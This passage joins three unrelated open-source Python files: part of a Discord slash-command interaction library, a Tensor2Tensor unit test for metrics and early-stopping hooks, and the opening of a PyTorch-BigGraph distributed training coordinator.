:type embeds: List[discord.Embed]
:param tts: Whether to speak message using tts. Default ``False``.
:type tts: bool
:param file: File to send.
:type file: discord.File
:param files: Files to send.
:type files: List[discord.File]
:param allowed_mentions: AllowedMentions of the message.
:type allowed_mentions: discord.AllowedMentions
:param hidden: Whether the message is hidden, which means message content will only be seen to the author.
:type hidden: bool
:param delete_after: If provided, the number of seconds to wait in the background before deleting the message we just sent. If the deletion fails, then it is silently ignored.
:type delete_after: float
:param components: Message components in the response. The top level must be made of ActionRows.
:type components: List[dict]
:return: Union[discord.Message, dict]
"""
if embed and embeds:
raise error.IncorrectFormat("You can't use both `embed` and `embeds`!")
if embed:
embeds = [embed]
if embeds:
if not isinstance(embeds, list):
raise error.IncorrectFormat("Provide a list of embeds.")
elif len(embeds) > 10:
raise error.IncorrectFormat("Do not provide more than 10 embeds.")
if file and files:
raise error.IncorrectFormat("You can't use both `file` and `files`!")
if file:
files = [file]
if delete_after and hidden:
raise error.IncorrectFormat("You can't delete a hidden message!")
if components and not all(comp.get("type") == 1 for comp in components):
raise error.IncorrectFormat(
"The top level of the components list must be made of ActionRows!"
)
if allowed_mentions is not None:
if self.bot.allowed_mentions is not None:
allowed_mentions = self.bot.allowed_mentions.merge(allowed_mentions).to_dict()
else:
allowed_mentions = allowed_mentions.to_dict()
else:
if self.bot.allowed_mentions is not None:
allowed_mentions = self.bot.allowed_mentions.to_dict()
else:
allowed_mentions = {}
base = {
"content": content,
"tts": tts,
"embeds": [x.to_dict() for x in embeds] if embeds else [],
"allowed_mentions": allowed_mentions,
"components": components or [],
}
if hidden:
base["flags"] = 64
initial_message = False
if not self.responded:
initial_message = True
if files and not self.deferred:
await self.defer(hidden=hidden)
if self.deferred:
if self._deferred_hidden != hidden:
self._logger.warning(
"Deferred response might not be what you set it to! (hidden / visible) "
"This is because it was deferred in a different state."
)
resp = await self._http.edit(base, self._token, files=files)
self.deferred = False
else:
json_data = {"type": 4, "data": base}
await self._http.post_initial_response(json_data, self.interaction_id, self._token)
if not hidden:
resp = await self._http.edit({}, self._token)
else:
resp = {}
self.responded = True
else:
resp = await self._http.post_followup(base, self._token, files=files)
if files:
for file in files:
file.close()
if not hidden:
smsg = model.SlashMessage(
state=self.bot._connection,
data=resp,
channel=self.channel or discord.Object(id=self.channel_id),
_http=self._http,
interaction_token=self._token,
)
if delete_after:
self.bot.loop.create_task(smsg.delete(delay=delete_after))
if initial_message:
self.message = smsg
return smsg
else:
return resp
async def reply(
self,
content: str = "",
*,
embed: discord.Embed = None,
embeds: typing.List[discord.Embed] = None,
tts: bool = False,
file: discord.File = None,
files: typing.List[discord.File] = None,
allowed_mentions: discord.AllowedMentions = None,
hidden: bool = False,
delete_after: float = None,
components: typing.List[dict] = None,
) -> model.SlashMessage:
"""
Sends response of the interaction. This is currently an alias of the ``.send()`` method.
.. warning::
- Since Release 1.0.9, this is completely changed. If you are migrating from older version, please make sure to fix the usage.
- You can't use both ``embed`` and ``embeds`` at the same time, also applies to ``file`` and ``files``.
- If you send files in the initial response, this will defer if it's not been deferred, and then PATCH with the message
:param content: Content of the response.
:type content: str
:param embed: Embed of the response.
:type embed: discord.Embed
:param embeds: Embeds of the response. Maximum 10.
:type embeds: List[discord.Embed]
:param tts: Whether to speak message using tts. Default ``False``.
:type tts: bool
:param file: File to send.
:type file: discord.File
:param files: Files to send.
:type files: List[discord.File]
:param allowed_mentions: AllowedMentions of the message.
:type allowed_mentions: discord.AllowedMentions
:param hidden: Whether the message is hidden, which means message content will only be seen to the author.
:type hidden: bool
:param delete_after: If provided, the number of seconds to wait in the background before deleting the message we just sent. If the deletion fails, then it is silently ignored.
:type delete_after: float
:param components: Message components in the response. The top level must be made of ActionRows.
:type components: List[dict]
:return: Union[discord.Message, dict]
"""
return await self.send(
content=content,
embed=embed,
embeds=embeds,
tts=tts,
file=file,
files=files,
allowed_mentions=allowed_mentions,
hidden=hidden,
delete_after=delete_after,
components=components,
)
class SlashContext(InteractionContext):
"""
Context of a slash command. Has all attributes from :class:`InteractionContext`, plus the slash-command-specific ones below.
:ivar name: Name of the command.
:ivar args: List of processed arguments invoked with the command.
:ivar kwargs: Dictionary of processed arguments invoked with the command.
:ivar subcommand_name: Subcommand of the command.
:ivar subcommand_group: Subcommand group of the command.
:ivar command_id: ID of the command.
"""
def __init__(
self,
_http: http.SlashCommandRequest,
_json: dict,
_discord: typing.Union[discord.Client, commands.Bot],
logger,
):
self.name = self.command = self.invoked_with = _json["data"]["name"]
self.args = []
self.kwargs = {}
self.subcommand_name = self.invoked_subcommand = self.subcommand_passed = None
self.subcommand_group = self.invoked_subcommand_group = self.subcommand_group_passed = None
self.command_id = _json["data"]["id"]
super().__init__(_http=_http, _json=_json, _discord=_discord, logger=logger)
@property
def slash(self) -> "client.SlashCommand":
"""
Returns the associated SlashCommand object created during Runtime.
:return: client.SlashCommand
"""
return self.bot.slash # noqa
@property
def cog(self) -> typing.Optional[commands.Cog]:
"""
Returns the cog associated with the command invoked, if any.
:return: Optional[commands.Cog]
"""
cmd_obj = self.slash.commands[self.command]
if isinstance(cmd_obj, (model.CogBaseCommandObject, model.CogSubcommandObject)):
return cmd_obj.cog
else:
return None
async def invoke(self, *args, **kwargs):
"""
Invokes a command with the arguments given.\n
Similar to d.py's `ctx.invoke` function and documentation.\n
.. note::
This does not handle converters, checks, cooldowns, pre-invoke,
or after-invoke hooks in any matter. It calls the internal callback
directly as-if it was a regular function.
You must take care in passing the proper arguments when
using this function.
.. warning::
The first parameter passed **must** be the command being invoked.
While using `ctx.defer`, if the command invoked includes usage of that command, do not invoke
`ctx.defer` before calling this function. It can not defer twice.
:param args: Args for the command.
:param kwargs: Keyword args for the command.
:raises: :exc:`TypeError`
"""
try:
command = args[0]
except IndexError:
raise TypeError("Missing command to invoke.") from None
ret = await self.slash.invoke_command(func=command, ctx=self, args=kwargs)
return ret
class ComponentContext(InteractionContext):
"""
Context of a component interaction. Has all attributes from :class:`InteractionContext`, plus the component-specific ones below.
:ivar custom_id: The custom ID of the component (has alias component_id).
:ivar component_type: The type of the component.
:ivar component: Component data retrieved from the message. Not available if the origin message was ephemeral.
:ivar origin_message: The origin message of the component. Not available if the origin message was ephemeral.
:ivar origin_message_id: The ID of the origin message.
:ivar selected_options: The options selected (only for selects)
"""
def __init__(
self,
_http: http.SlashCommandRequest,
_json: dict,
_discord: typing.Union[discord.Client, commands.Bot],
logger,
):
self.custom_id = self.component_id = _json["data"]["custom_id"]
self.component_type = _json["data"]["component_type"]
super().__init__(_http=_http, _json=_json, _discord=_discord, logger=logger)
self.origin_message = None
self.origin_message_id = int(_json["message"]["id"]) if "message" in _json.keys() else None
self.component = None
self._deferred_edit_origin = False
if self.origin_message_id and (_json["message"]["flags"] & 64) != 64:
self.origin_message = ComponentMessage(
state=self.bot._connection, channel=self.channel, data=_json["message"]
)
self.component = self.origin_message.get_component(self.custom_id)
self.selected_options = None
if self.component_type == 3:
self.selected_options = _json["data"].get("values", [])
async def defer(self, hidden: bool = False, edit_origin: bool = False, ignore: bool = False):
"""
'Defers' the response, showing a loading state to the user
:param hidden: Whether the deferred response should be ephemeral. Default ``False``.
:param edit_origin: Whether the type is editing the origin message. If ``False``, the deferred response will be for a follow up message. Defaults ``False``.
:param ignore: Whether to just ignore and not edit or send response. Using this can avoid showing interaction loading state. Default ``False``.
"""
if self.deferred or self.responded:
raise error.AlreadyResponded("You have already responded to this command!")
base = {"type": 6 if edit_origin or ignore else 5}
if edit_origin and ignore:
raise error.IncorrectFormat("'edit_origin' and 'ignore' are mutually exclusive")
if hidden:
if edit_origin:
raise error.IncorrectFormat(
"'hidden' and 'edit_origin' flags are mutually exclusive"
)
elif ignore:
self._deferred_hidden = True
else:
base["data"] = {"flags": 64}
self._deferred_hidden = True
self._deferred_edit_origin = edit_origin
await self._http.post_initial_response(base, self.interaction_id, self._token)
self.deferred = not ignore
if ignore:
self.responded = True
async def send(
self,
content: str = "",
*,
embed: discord.Embed = None,
embeds: typing.List[discord.Embed] = None,
tts: bool = False,
file: discord.File = None,
files: typing.List[discord.File] = None,
allowed_mentions: discord.AllowedMentions = None,
hidden: bool = False,
delete_after: float = None,
components: typing.List[dict] = None,
) -> model.SlashMessage:
if self.deferred and self._deferred_edit_origin:
self._logger.warning(
"Deferred response might not be what you set it to! (edit origin / send response message) "
"This is because it was deferred with different response type."
)
return await super().send(
content,
embed=embed,
embeds=embeds,
tts=tts,
file=file,
files=files,
allowed_mentions=allowed_mentions,
hidden=hidden,
delete_after=delete_after,
components=components,
)
async def edit_origin(self, **fields):
"""
Edits the origin message of the component.
Refer to :meth:`discord.Message.edit` and :meth:`InteractionContext.send` for fields.
"""
_resp = {}
try:
content = fields["content"]
except KeyError:
pass
else:
if content is not None:
content = str(content)
_resp["content"] = content
try:
components = fields["components"]
except KeyError:
pass
else:
if components is None:
_resp["components"] = []
else:
_resp["components"] = components
try:
embeds = fields["embeds"]
except KeyError:
# Nope
pass
else:
if not isinstance(embeds, list):
raise error.IncorrectFormat("Provide a list of embeds.")
if len(embeds) > 10:
raise error.IncorrectFormat("Do not provide more than 10 embeds.")
_resp["embeds"] = [e.to_dict() for e in embeds]
try:
embed = fields["embed"]
except KeyError:
pass
else:
if "embeds" in _resp:
raise error.IncorrectFormat("You can't use both `embed` and `embeds`!")
if embed is None:
_resp["embeds"] = []
else:
_resp["embeds"] = [embed.to_dict()]
file = fields.get("file")
files = fields.get("files")
if files is not None and file is not None:
raise error.IncorrectFormat("You can't use both `file` and `files`!")
if file:
files = [file]
allowed_mentions = fields.get("allowed_mentions")
if allowed_mentions is not None:
if self.bot.allowed_mentions is not None:
_resp["allowed_mentions"] = self.bot.allowed_mentions.merge(
allowed_mentions
).to_dict()
else:
_resp["allowed_mentions"] = allowed_mentions.to_dict()
else:
if self.bot.allowed_mentions is not None:
_resp["allowed_mentions"] = self.bot.allowed_mentions.to_dict()
else:
_resp["allowed_mentions"] = {}
if not self.responded:
if files and not self.deferred:
await self.defer(edit_origin=True)
if self.deferred:
if not self._deferred_edit_origin:
self._logger.warning(
"Deferred response might not be what you set it to! (edit origin / send response message) "
"This is because it was deferred with different response type."
)
_json = await self._http.edit(_resp, self._token, files=files)
self.deferred = False
else: # noqa: F841
json_data = {"type": 7, "data": _resp}
_json = await self._http.post_initial_response( # noqa: F841
json_data, self.interaction_id, self._token
)
self.responded = True
else:
raise error.IncorrectFormat("Already responded")
if files:
for file in files:
file.close()
# Commented out for now as sometimes (or at least, when not deferred) _json is an empty string?
# self.origin_message = ComponentMessage(state=self.bot._connection, channel=self.channel,
# data=_json)
class MenuContext(InteractionContext):
"""
Context of a context menu interaction. Has all attributes from :class:`InteractionContext`, plus the context-specific ones below.
:ivar context_type: The type of context menu command.
:ivar _resolved: The data set for the context menu.
:ivar target_message: The targeted message of the context menu command if present. Defaults to ``None``.
:ivar target_id: The target ID of the context menu command.
:ivar target_author: The author targeted from the context menu command.
"""
def __init__(
self,
_http: http.SlashCommandRequest,
_json: dict,
_discord: typing.Union[discord.Client, commands.Bot],
logger,
):
super().__init__(_http=_http, _json=_json, _discord=_discord, logger=logger)
self.context_type = _json["type"]
self._resolved = self.data["resolved"] if "resolved" in self.data.keys() else None
self.target_message = None
self.target_author = None
self.target_id = self.data["target_id"]
if self._resolved is not None:
try:
if self._resolved["messages"]:
_msg = [msg for msg in self._resolved["messages"]][0]
self.target_message = model.SlashMessage(
state=self.bot._connection,
channel=_discord.get_channel(self.channel_id),
data=self._resolved["messages"][_msg],
_http=_http,
interaction_token=self._token,
)
except KeyError: # noqa
pass
try:
if self.guild and self._resolved["members"]:
_auth = [auth for auth in self._resolved["members"]][0]
self.target_author = discord.Member(
data=self._resolved["members"][_auth],
state=self.bot._connection,
guild=self.guild,
)
else:
_auth = [auth for auth in self._resolved["users"]][0]
self.target_author = discord.User(
data=self._resolved["users"][_auth], state=self.bot._connection
)
except KeyError: # noqa
pass
@property
def cog(self) -> typing.Optional[commands.Cog]:
"""
Returns the cog associated with the command invoked, if any.
:return: Optional[commands.Cog]
"""
cmd_obj = self.slash.commands[self.command]
if isinstance(cmd_obj, (model.CogBaseCommandObject, model.CogSubcommandObject)):
return cmd_obj.cog
else:
return None
async def defer(self, hidden: bool = False, edit_origin: bool = False, ignore: bool = False):
"""
'Defers' the response, showing a loading state to the user
:param hidden: Whether the deferred response should be ephemeral. Default ``False``.
:param edit_origin: Whether the type is editing the origin message. If ``False``, the deferred response will be for a follow up message. Defaults ``False``.
:param ignore: Whether to just ignore and not edit or send response. Using this can avoid showing interaction loading state. Default ``False``.
"""
if self.deferred or self.responded:
raise error.AlreadyResponded("You have already responded to this command!")
base = {"type": 6 if edit_origin or ignore else 5}
if edit_origin and ignore:
raise error.IncorrectFormat("'edit_origin' and 'ignore' are mutually exclusive")
if hidden:
if edit_origin:
raise error.IncorrectFormat(
"'hidden' and 'edit_origin' flags are mutually exclusive"
)
elif ignore:
self._deferred_hidden = True
else:
base["data"] = {"flags": 64}
self._deferred_hidden = True
self._deferred_edit_origin = edit_origin
await self._http.post_initial_response(base, self.interaction_id, self._token)
self.deferred = not ignore
if ignore:
self.responded = True
async def send(
self,
content: str = "",
*,
embed: discord.Embed = None,
embeds: typing.List[discord.Embed] = None,
tts: bool = False,
file: discord.File = None,
files: typing.List[discord.File] = None,
allowed_mentions: discord.AllowedMentions = None,
hidden: bool = False,
delete_after: float = None,
components: typing.List[dict] = None,
) -> model.SlashMessage:
if self.deferred and self._deferred_edit_origin:
self._logger.warning(
"Deferred response might not be what you set it to! (edit origin / send response message) "
"This is because it was deferred with different response type."
)
return await super().send(
content,
embed=embed,
embeds=embeds,
tts=tts,
file=file,
files=files,
allowed_mentions=allowed_mentions,
hidden=hidden,
delete_after=delete_after,
components=components,
)
|
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for metrics_hook."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import shutil
from tensor2tensor.utils import metrics_hook
import tensorflow as tf
class DummyHook(metrics_hook.MetricsBasedHook):
def _process_metrics(self, global_step, metrics):
if metrics:
assert "" in metrics
assert isinstance(metrics[""], dict)
if metrics[""]:
assert "global_step_1" in metrics[""]
self.test_metrics = metrics
if global_step >= 40:
return True
class MetricsHookTest(tf.test.TestCase):
@classmethod
def setUpClass(cls):
cls.base_checkpoint_dir = tf.test.get_temp_dir()
shutil.rmtree(cls.base_checkpoint_dir, ignore_errors=True)
def ckpt_dir(self, name):
return os.path.join(self.base_checkpoint_dir, name)
@contextlib.contextmanager
def sess(self, hook, ckpt_dir):
with tf.train.MonitoredTrainingSession(
checkpoint_dir=ckpt_dir,
save_checkpoint_secs=0,
save_summaries_steps=10,
hooks=[hook]) as sess:
self._sess = sess
yield sess
def flush(self):
self._sess._hooks[1]._summary_writer.flush()
def testStop(self):
global_step = tf.train.create_global_step()
tf.summary.scalar("global_step", global_step)
incr_global_step = tf.assign_add(global_step, 1)
ckpt_dir = self.ckpt_dir("stop")
dummy = DummyHook(ckpt_dir, every_n_steps=10)
with self.sess(dummy, ckpt_dir) as sess:
for _ in range(20):
sess.run(incr_global_step)
# Summary files should now have 2 global step values in them
self.flush()
# Run for 10 more so that the hook gets triggered again
for _ in range(10):
sess.run(incr_global_step)
# Check that the metrics have actually been collected.
self.assertTrue("" in dummy.test_metrics)
metrics = dummy.test_metrics[""]
self.assertTrue("global_step_1" in metrics)
steps, vals = metrics["global_step_1"]
self.assertTrue(len(steps) == len(vals))
self.assertTrue(len(steps) >= 2)
# Run for 10 more so that the hook triggers stoppage
for _ in range(10):
sess.run(incr_global_step)
with self.assertRaisesRegexp(RuntimeError, "after should_stop requested"):
sess.run(incr_global_step)
def testEarlyStoppingHook(self):
global_step = tf.train.create_global_step()
counter = tf.get_variable("count", initializer=0, dtype=tf.int32)
tf.summary.scalar("count", counter)
incr_global_step = tf.assign_add(global_step, 1)
incr_counter = tf.assign_add(counter, 1)
# Stop if the global step has not gone up by more than 1 in 20 steps.
ckpt_dir = self.ckpt_dir("early")
stop_hook = metrics_hook.EarlyStoppingHook(
ckpt_dir,
"count_1",
num_plateau_steps=20,
plateau_delta=1.,
plateau_decrease=False,
every_n_steps=10)
with self.sess(stop_hook, ckpt_dir) as sess:
for _ in range(20):
sess.run((incr_global_step, incr_counter))
# Summary files should now have 2 values in them
self.flush()
# Run for more steps so that the hook gets triggered and we verify that we
# don't stop.
for _ in range(30):
sess.run((incr_global_step, incr_counter))
self.flush()
# Run without incrementing the counter
for _ in range(40):
sess.run(incr_global_step)
# Metrics should be written such that now the counter has gone >20 steps
# without being incremented.
self.flush()
# Check that we ask for stop
with self.assertRaisesRegexp(RuntimeError, "after should_stop requested"):
for _ in range(30):
sess.run(incr_global_step)
def testPlateauOpHook(self):
global_step = tf.train.create_global_step()
counter = tf.get_variable("count", initializer=0, dtype=tf.int32)
indicator = tf.get_variable("indicator", initializer=0, dtype=tf.int32)
tf.summary.scalar("count", counter)
incr_global_step = tf.assign_add(global_step, 1)
incr_counter = tf.assign_add(counter, 1)
incr_indicator = tf.assign_add(indicator, 1)
# Stop if the global step has not gone up by more than 1 in 20 steps.
ckpt_dir = self.ckpt_dir("plateauop")
stop_hook = metrics_hook.PlateauOpHook(
ckpt_dir,
"count_1",
incr_indicator,
num_plateau_steps=20,
plateau_delta=1.,
plateau_decrease=False,
every_n_steps=10)
with self.sess(stop_hook, ckpt_dir) as sess:
for _ in range(20):
sess.run((incr_global_step, incr_counter))
# Summary files should now have 2 values in them
self.flush()
# Run for more steps so that the hook gets triggered and we verify that we
# don't stop.
for _ in range(30):
sess.run((incr_global_step, incr_counter))
self.flush()
# Run without incrementing the counter
for _ in range(30):
sess.run(incr_global_step)
self.flush()
self.assertTrue(sess.run(indicator) < 1)
# Metrics should be written such that now the counter has gone >20 steps
# without being incremented.
# Check that we run the incr_indicator op several times
for _ in range(3):
for _ in range(10):
sess.run(incr_global_step)
self.flush()
self.assertTrue(sess.run(indicator) > 1)
if __name__ == "__main__":
tf.test.main()
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE.txt file in the root directory of this source tree.
import logging
import math
import time
from collections import defaultdict
from functools import partial
from typing import Any, Callable, Dict, Iterable, List, Optional, Set, Tuple
import torch
import torch.distributed as td
from torch.optim import Optimizer
from torchbiggraph.async_adagrad import AsyncAdagrad
from torchbiggraph.batching import AbstractBatchProcessor, call, process_in_batches
from torchbiggraph.bucket_scheduling import (
BucketStats,
DistributedBucketScheduler,
LockServer,
SingleMachineBucketScheduler,
)
from torchbiggraph.checkpoint_manager import (
CheckpointManager,
ConfigMetadataProvider,
MetadataProvider,
PartitionClient,
)
from torchbiggraph.config import ConfigSchema
from torchbiggraph.distributed import ProcessRanks, init_process_group, start_server
from torchbiggraph.edgelist import EdgeList
from torchbiggraph.eval import RankingEvaluator
from torchbiggraph.graph_storages import EDGE_STORAGES, ENTITY_STORAGES
from torchbiggraph.losses import LOSS_FUNCTIONS, AbstractLossFunction
from torchbiggraph.model import MultiRelationEmbedder, make_model
from torchbiggraph.parameter_sharing import ParameterServer, ParameterSharer
from torchbiggraph.row_adagrad import RowAdagrad
from torchbiggraph.stats import Stats, StatsHandler
from torchbiggraph.types import (
SINGLE_TRAINER,
UNPARTITIONED,
Bucket,
EntityName,
FloatTensorType,
ModuleStateDict,
Partition,
Rank,
)
from torchbiggraph.util import (
BucketLogger,
DummyOptimizer,
EmbeddingHolder,
allocate_shared_tensor,
create_pool,
fast_approx_rand,
get_async_result,
get_num_workers,
hide_distributed_logging,
round_up_to_nearest_multiple,
split_almost_equally,
tag_logs_with_process_name,
)
logger = logging.getLogger("torchbiggraph")
dist_logger = logging.LoggerAdapter(logger, {"distributed": True})
class Trainer(AbstractBatchProcessor):
def __init__(
self,
model_optimizer: Optimizer,
loss_fn: AbstractLossFunction,
relation_weights: List[float],
) -> None:
super().__init__(loss_fn, relation_weights)
self.model_optimizer = model_optimizer
self.unpartitioned_optimizers: Dict[EntityName, Optimizer] = {}
self.partitioned_optimizers: Dict[Tuple[EntityName, Partition], Optimizer] = {}
def _process_one_batch(
self, model: MultiRelationEmbedder, batch_edges: EdgeList
) -> Stats:
model.zero_grad()
scores, reg = model(batch_edges)
loss = self.calc_loss(scores, batch_edges)
stats = Stats(
loss=float(loss),
reg=float(reg) if reg is not None else 0.0,
violators_lhs=int((scores.lhs_neg > scores.lhs_pos.unsqueeze(1)).sum()),
violators_rhs=int((scores.rhs_neg > scores.rhs_pos.unsqueeze(1)).sum()),
count=len(batch_edges),
)
if reg is not None:
(loss + reg).backward()
else:
loss.backward()
self.model_optimizer.step(closure=None)
for optimizer in self.unpartitioned_optimizers.values():
optimizer.step(closure=None)
for optimizer in self.partitioned_optimizers.values():
optimizer.step(closure=None)
return stats
class IterationManager(MetadataProvider):
def __init__(
self,
num_epochs: int,
edge_paths: List[str],
num_edge_chunks: int,
*,
iteration_idx: int = 0,
) -> None:
self.num_epochs = num_epochs
self.edge_paths = edge_paths
self.num_edge_chunks = num_edge_chunks
self.iteration_idx = iteration_idx
@property
def epoch_idx(self) -> int:
return self.iteration_idx // self.num_edge_chunks // self.num_edge_paths
@property
def num_edge_paths(self) -> int:
return len(self.edge_paths)
@property
def edge_path_idx(self) -> int:
return self.iteration_idx // self.num_edge_chunks % self.num_edge_paths
@property
def edge_path(self) -> str:
return self.edge_paths[self.edge_path_idx]
@property
def edge_chunk_idx(self) -> int:
return self.iteration_idx % self.num_edge_chunks
def __iter__(self) -> Iterable[Tuple[int, int, int]]:
while self.epoch_idx < self.num_epochs:
yield self.epoch_idx, self.edge_path_idx, self.edge_chunk_idx
self.iteration_idx += 1
def get_checkpoint_metadata(self) -> Dict[str, Any]:
return {
"iteration/num_epochs": self.num_epochs,
"iteration/epoch_idx": self.epoch_idx,
"iteration/num_edge_paths": self.num_edge_paths,
"iteration/edge_path_idx": self.edge_path_idx,
"iteration/edge_path": self.edge_path,
"iteration/num_edge_chunks": self.num_edge_chunks,
"iteration/edge_chunk_idx": self.edge_chunk_idx,
}
def __add__(self, delta: int) -> "IterationManager":
return IterationManager(
self.num_epochs,
self.edge_paths,
self.num_edge_chunks,
iteration_idx=self.iteration_idx + delta,
)
def should_preserve_old_checkpoint(
iteration_manager: IterationManager, interval: Optional[int]
) -> bool:
"""Whether the checkpoint consumed by the current iteration should be kept
Given the period, in number of epochs, at which to snapshot checkpoints,
determinen whether the checkpoint that is used as input by the current
iteration (as determined by the given manager) should be preserved rather
than getting cleaned up.
"""
if interval is None:
return False
is_checkpoint_epoch = iteration_manager.epoch_idx % interval == 0
is_first_edge_path = iteration_manager.edge_path_idx == 0
is_first_edge_chunk = iteration_manager.edge_chunk_idx == 0
return is_checkpoint_epoch and is_first_edge_path and is_first_edge_chunk
def get_num_edge_chunks(config: ConfigSchema) -> int:
if config.num_edge_chunks is not None:
return config.num_edge_chunks
max_edges_per_bucket = 0
# We should check all edge paths, all lhs partitions and all rhs partitions,
# but the combinatorial explosion could lead to thousands of checks. Let's
# assume that edges are uniformly distributed among buckets (this is not
# exactly the case, as it's the entities that are uniformly distributed
# among the partitions, and edge assignments to buckets are a function of
# that, thus, for example, very high degree entities could skew this), and
# use the size of bucket (0, 0) as an estimate of the average bucket size.
# We still do it for all edge paths as there could be semantic differences
# between them which lead to different sizes.
for edge_path in config.edge_paths:
edge_storage = EDGE_STORAGES.make_instance(edge_path)
max_edges_per_bucket = max(
max_edges_per_bucket,
edge_storage.get_number_of_edges(UNPARTITIONED, UNPARTITIONED),
)
return max(1, math.ceil(max_edges_per_bucket / config.max_edges_per_chunk))
def make_optimizer(
config: ConfigSchema, params: Iterable[torch.nn.Parameter], is_emb: bool
) -> Optimizer:
params = list(params)
if len(params) == 0:
optimizer = DummyOptimizer()
elif is_emb:
optimizer = RowAdagrad(params, lr=config.lr)
else:
if config.relation_lr is not None:
lr = config.relation_lr
else:
lr = config.lr
optimizer = AsyncAdagrad(params, lr=lr)
optimizer.share_memory()
return optimizer
NOOP_STATS_HANDLER = StatsHandler()
class TrainingCoordinator:
def __init__( # noqa
self,
config: ConfigSchema,
model: Optional[MultiRelationEmbedder] = None,
trainer: Optional[AbstractBatchProcessor] = None,
evaluator: Optional[AbstractBatchProcessor] = None,
rank: Rank = SINGLE_TRAINER,
subprocess_init: Optional[Callable[[], None]] = None,
stats_handler: StatsHandler = NOOP_STATS_HANDLER,
):
"""Each epoch/pass, for each partition pair, loads in embeddings and edgelist
from disk, runs HOGWILD training on them, and writes partitions back to disk.
"""
tag_logs_with_process_name(f"Trainer-{rank}")
self.config = config
if config.verbose > 0:
import pprint
pprint.PrettyPrinter().pprint(config.to_dict())
logger.info("Loading entity counts...")
entity_storage = ENTITY_STORAGES.make_instance(config.entity_path)
entity_counts: Dict[str, List[int]] = {}
for entity, econf in config.entities.items():
entity_counts[entity] = []
for part in range(econf.num_partitions):
entity_counts[entity].append(entity_storage.load_count(entity, part))
# Figure out how many lhs and rhs partitions we need
holder = self.holder = EmbeddingHolder(config)
logger.debug(
f"nparts {holder.nparts_lhs} {holder.nparts_rhs} "
f"types {holder.lhs_partitioned_types} {holder.rhs_partitioned_types}"
)
# We know ahead of time that we wil need 1-2 storages for each embedding type,
# as well as the max size of this storage (num_entities x D).
# We allocate these storages n advance in `embedding_storage_freelist`.
# When we need storage for an entity type, we pop it from this free list,
# and then add it back when we 'delete' the embedding table.
embedding_storage_freelist: Dict[
EntityName, Set[torch.FloatStorage]
] = defaultdict(set)
for entity_type, counts in entity_counts.items():
max_count = max(counts)
num_sides = (
(1 if entity_type in holder.lhs_partitioned_types else 0)
+ (1 if entity_type in holder.rhs_partitioned_types else 0)
+ (
1
if entity_type
in (holder.lhs_unpartitioned_types | holder.rhs_unpartitioned_types)
else 0
)
)
for _ in range(num_sides):
embedding_storage_freelist[entity_type].add(
allocate_shared_tensor(
(max_count, config.entity_dimension(entity_type)),
dtype=torch.float,
).storage()
)
# create the handlers, threads, etc. for distributed training
if config.num_machines > 1 or config.num_partition_servers > 0:
if not 0 <= rank < config.num_machines:
raise RuntimeError("Invalid rank for trainer")
if not td.is_available():
raise RuntimeError(
"The installed PyTorch version doesn't provide "
"distributed training capabilities."
)
ranks = ProcessRanks.from_num_invocations(
config.num_machines, config.num_partition_servers
)
num_ps_groups = config.num_groups_for_partition_server
groups: List[List[int]] = [ranks.trainers] # barrier group
groups += [
ranks.trainers + ranks.partition_servers
] * num_ps_groups # ps groups
group_idxs_for_partition_servers = range(1, len(groups))
if rank == SINGLE_TRAINER:
logger.info("Setup lock server...")
start_server(
LockServer(
num_clients=len(ranks.trainers),
nparts_lhs=holder.nparts_lhs,
nparts_rhs=holder.nparts_rhs,
entities_lhs=holder.lhs_partitioned_types,
entities_rhs=holder.rhs_partitioned_types,
entity_counts=entity_counts,
init_tree=config.distributed_tree_init_order,
stats_handler=stats_handler,
),
process_name="LockServer",
init_method=config.distributed_init_method,
world_size=ranks.world_size,
server_rank=ranks.lock_server,
groups=groups,
subprocess_init=subprocess_init,
)
self.bucket_scheduler = DistributedBucketScheduler(
server_rank=ranks.lock_server, client_rank=ranks.trainers[rank]
)
logger.info("Setup param server...")
start_server(
ParameterServer(num_clients=len(ranks.trainers)),
process_name=f"ParamS-{rank}",
init_method=config.distributed_init_method,
world_size=ranks.world_size,
server_rank=ranks.parameter_servers[rank],
groups=groups,
subprocess_init=subprocess_init,
)
parameter_sharer = ParameterSharer(
process_name=f"ParamC-{rank}",
client_rank=ranks.parameter_clients[rank],
all_server_ranks=ranks.parameter_servers,
init_method=config.distributed_init_method,
world_size=ranks.world_size,
groups=groups,
subprocess_init=subprocess_init,
)
if config.num_partition_servers == -1:
start_server(
ParameterServer(
num_clients=len(ranks.trainers),
group_idxs=group_idxs_for_partition_servers,
log_stats=True,
),
process_name=f"PartS-{rank}",
init_method=config.distributed_init_method,
world_size=ranks.world_size,
server_rank=ranks.partition_servers[rank],
groups=groups,
subprocess_init=subprocess_init,
)
groups = init_process_group(
rank=ranks.trainers[rank],
world_size=ranks.world_size,
init_method=config.distributed_init_method,
groups=groups,
)
trainer_group, *groups_for_partition_servers = groups
self.barrier_group = trainer_group
if len(ranks.partition_servers) > 0:
partition_client = PartitionClient(
ranks.partition_servers,
groups=groups_for_partition_servers,
log_stats=True,
)
else:
partition_client = None
else:
self.barrier_group = None
self.bucket_scheduler = SingleMachineBucketScheduler(
holder.nparts_lhs, holder.nparts_rhs, config.bucket_order, stats_handler
)
parameter_sharer = None
partition_client = None
hide_distributed_logging()
# fork early for HOGWILD threads
logger.info("Creating workers...")
self.num_workers = get_num_workers(config.workers)
self.pool = create_pool(
self.num_workers,
subprocess_name=f"TWorker-{rank}",
subprocess_init=subprocess_init,
)
checkpoint_manager = CheckpointManager(
config.checkpoint_path,
rank=rank,
num_machines=config.num_machines,
partition_client=partition_client,
subprocess_name=f"BackgRW-{rank}",
subprocess_init=subprocess_init,
)
self.checkpoint_manager = checkpoint_manager
checkpoint_manager.register_metadata_provider(ConfigMetadataProvider(config))
if rank == 0:
checkpoint_manager.write_config(config)
num_edge_chunks = get_num_edge_chunks(config)
self.iteration_manager = IterationManager(
config.num_epochs,
config.edge_paths,
num_edge_chunks,
